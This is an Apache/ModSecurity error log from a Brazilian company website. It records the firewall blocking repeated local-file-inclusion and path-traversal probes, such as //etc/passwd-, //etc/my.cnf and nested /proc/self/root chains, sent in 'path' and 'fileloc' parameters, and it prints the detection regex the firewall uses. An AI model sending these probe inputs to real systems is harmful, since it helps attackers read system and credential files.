[Wed Mar 18 00:22:15.881117 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:37924] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaZ9a6ubjKNq_cu4ZA-AAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:22:19.544556 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:53806] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaa-oXxyEfFpUF8f8YbwAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:22:24.939050 2026] [:error] [pid 19507:tid 140411641214720] [client 216.73.216.191:51897] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboacNY0UrI5A3LftIw6XQAAAYw"]
[Wed Mar 18 00:22:32.069848 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:53584] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:22:49.823739 2026] [:error] [pid 19507:tid 140411716749056] [client 216.73.216.191:23103] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboaidY0UrI5A3LftIw6cgAAAYM"]
[Wed Mar 18 00:22:53.126358 2026] [proxy_fcgi:error] [pid 11816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53918] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:22:57.263677 2026] [:error] [pid 26799:tid 140411624429312] [client 216.73.216.191:59458] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboakda6ubjKNq_cu4ZBEAAAA04"]
[Wed Mar 18 00:23:15.129794 2026] [proxy_fcgi:error] [pid 29882:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54356] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:23:16.539015 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:7773] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboapOoXxyEfFpUF8f8YfQAAAUI"]
[Wed Mar 18 00:23:16.841945 2026] [:error] [pid 15051:tid 140411699963648] [client 216.73.216.191:30985] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboapCmAPhZkrhU8w4kbtAAAAIU"]
[Wed Mar 18 00:23:38.128212 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:54798] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:23:40.010664 2026] [:error] [pid 15051:tid 140411565680384] [client 216.73.216.191:9819] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboavCmAPhZkrhU8w4kbuAAAAJU"]
[Wed Mar 18 00:23:45.266728 2026] [:error] [pid 15051:tid 140411616036608] [client 216.73.216.191:42921] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/passwd-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboawSmAPhZkrhU8w4kbvAAAAI8"]
[Wed Mar 18 00:24:00.137832 2026] [proxy_fcgi:error] [pid 2598:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55348] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:24:23.121563 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:55776] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:24:30.177256 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.241.31:45160] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboa7tY0UrI5A3LftIw6xgAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:24:32.040784 2026] [:error] [pid 30821:tid 140411649607424] [client 74.7.241.31:42970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboa8B-NeY3uobaIEjbcFwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:24:45.122725 2026] [proxy_fcgi:error] [pid 15051:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56166] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:24:54.579796 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.244.43:46058] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abobBuyqAr6etmhZHNpiJAAAAEI"]
[Wed Mar 18 00:24:59.739756 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:42984] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobC-w_le52K8_3pV2LEAAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:25:05.931185 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:60866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobEda6ubjKNq_cu4ZBZAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:25:07.141885 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56524] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:25:08.476639 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.228.61:38356] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abobFPu8EFLIOrSqIpu0tQAAAlI"]
[Wed Mar 18 00:25:22.715581 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:35470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobIvu8EFLIOrSqIpu0yQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:25:29.105852 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56926] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:25:50.121816 2026] [proxy_fcgi:error] [pid 2598:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:57404] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:25:51.157048 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:60878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobP9Y0UrI5A3LftIw67gAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:26:07.233756 2026] [:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:32134] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobTcdf6f5d65gmYZR76gAAAsE"]
[Wed Mar 18 00:26:12.125808 2026] [proxy_fcgi:error] [pid 30077:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:26:12.707695 2026] [:error] [pid 31803:tid 140411725141760] [client 216.73.216.191:10539] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobVOyqAr6etmhZHNpiXgAAAEI"]
[Wed Mar 18 00:26:14.771174 2026] [:error] [pid 15051:tid 140411624429312] [client 216.73.216.191:50098] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobVimAPhZkrhU8w4kb1AAAAI4"]
[Wed Mar 18 00:26:15.411095 2026] [:error] [pid 17653:tid 140411582465792] [client 216.73.216.191:62517] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobV8df6f5d65gmYZR77wAAAtM"]
[Wed Mar 18 00:26:21.881352 2026] [:error] [pid 29882:tid 140411741927168] [client 216.73.216.191:14855] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobXUzinOy1jxa1j4e9HQAAAQA"]
[Wed Mar 18 00:26:22.483216 2026] [:error] [pid 15051:tid 140411599251200] [client 216.73.216.191:43869] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobXimAPhZkrhU8w4kb2gAAAJE"]
[Wed Mar 18 00:26:23.383040 2026] [:error] [pid 17653:tid 140411616036608] [client 216.73.216.191:23364] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobX8df6f5d65gmYZR78QAAAs8"]
[Wed Mar 18 00:26:26.103850 2026] [:error] [pid 26799:tid 140411691570944] [client 216.73.216.191:49809] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abobYta6ubjKNq_cu4ZBeAAAA0Y"]
